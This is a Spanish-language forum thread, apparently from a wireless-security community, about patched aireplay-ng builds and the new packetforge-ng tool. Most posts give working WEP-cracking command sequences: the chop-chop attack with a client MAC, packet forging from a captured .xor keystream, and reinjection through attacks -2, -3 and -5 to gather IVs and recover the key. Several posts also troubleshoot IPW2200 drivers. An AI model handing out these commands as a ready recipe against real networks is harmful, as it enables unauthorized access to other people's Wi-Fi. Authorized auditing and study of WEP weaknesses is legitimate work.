Mensajes

vale ya esta cambiado el link

[aireplay-ng -4 -h mac del cliente del AP(NO VALE NINGUNA OTRA )]

haber el atake -4 lo tienes q construir siempre y cuando haya un cliente conectado a esa AP

aireplay-ng -4 -h mac del cliente del AP(NO VALE NINGUNA OTRA )

Esperas a q aparezca un paquete cualquiera de es AP aunque tu cliente no aparezca como destinatario y lanza el ataque te saca las IP

el nuevo propgrama sirve para geberar ademas de ARP como hace el arpforge tarfico de tipo UDP, ICMP, CUSTOM lo q tienes q hacer es especificarlo antes de crear el paquete a enviar es decir si es udp pues pones

packetforge-ng --udp   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

si es icmp

packetforge-ng --icmp   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

asi sucesivamente.
necesitas el archivo *.xor porq lo q hace es volver a encriptarlo con la contraseña correcta para q puedas enviarle el paquete  q el router lo reconozca y  genere trafico

[packetforge-ng]

pues me referia a te refieres a instalar las headers .. y compilar el driver sobre live .. 

Bueno como ya ha sacado la version 0.3 y asi me adelanto al Mister X.

Caracteristicas parches mejorados para las IPW2200 ya aplicados sobre aireplay-ng para reinyectar
Y un nuevo programa packetforge-ng q sirve para crear paquetes del tipo ARP UDP ICMP CUSTOM y reinyectarlos y asi conseguir gran cantidad te IVS.

Lo primero es realizarzar el ataque CHOP-CHOP y despues usamos el Packetforge de la siguiente manaera.

packetforge-ng --tipo de paquete   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

eso hara q se cree un archivo llamado ejemplo
y ahora lo reinyectamos con ataque 2 el 3 no vale xq solo reinyecta ARP asi q usamos

aireplay-ng -2 -r ejemplo <iface>

debemos insertar el paquete cada 30 segundo asi q usamos

aireplay-ng -2 -r ejemplo -x 0.033 <iface>

una estupida pregunta dirigida a todos aquellos q tiene la IPW2200.
usais live-cd no?
habeis probado a bajaros el modulo SLAX actualizado del kernel y de las cabeceras grabarlo dentro del cd en la parte modulo y ejecutarlo creo q asi no tendriais fallos al compilar los drivers

http://www.slax.org/modules.php?action=search&q=kernel

no no existe xq no lo he desarrollado para windows xq en windows no se puede reinyectar.Asi q paque lo quieres ya q las caracteristicas mejoradas son mas q nada para reinyectar

bueno ya la tengo terminada haber si meto algo mas de codigo y al final de esta semana sale

[Hirte]

va a salir una nueva version la 0.3 ya q puede haber un posible fallo en el ataque 5 hay veces q no funciona como deberia.
detodas formas el reponsable de la parte de programacion Hirte q hace posibles estas nuevas modificaciones ha cambiado el codigo y ha creado un nuevo ejecutable el packetforge-ng.c

si se podria hacer haber si me pongo a ello

[aireplay-ng -3 -b MAC AP -h MAC cliente -x 1000 -y ARCHIVO.XOR ath0]

se puede hacer otro tipo de reinyeccion sin forjar el ARP mediante
PRIMERO CHOP-CHOP no hace falta descifrar el paquete utilizamos el archivo *.xor generado de la siguiente forma

aireplay-ng -3 -b MAC AP -h MAC cliente -x 1000  -y ARCHIVO.XOR ath0

es ub¡na reinyeccion muy rapida con un nivel de señal de 10 se reinyecta a unos 500 paquetes sefungo

[Puntillo]

entre la nuevas caracteristicas:
*sirve para las IPW2200 (gracias Puntillo por decirme lo del fallo ya esta corregido)
*PRGA Y WEPWedgie implementado
*Ataque -5 remoteflood

para usar este ultimo recordad q teneis q usasr antes el chop-chop y luego el codigo es el siguiente

aireplay-ng -5 -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -k <srcIP[:port]> -l <destIP[:port]> -o <iface>

bueno ya me contareis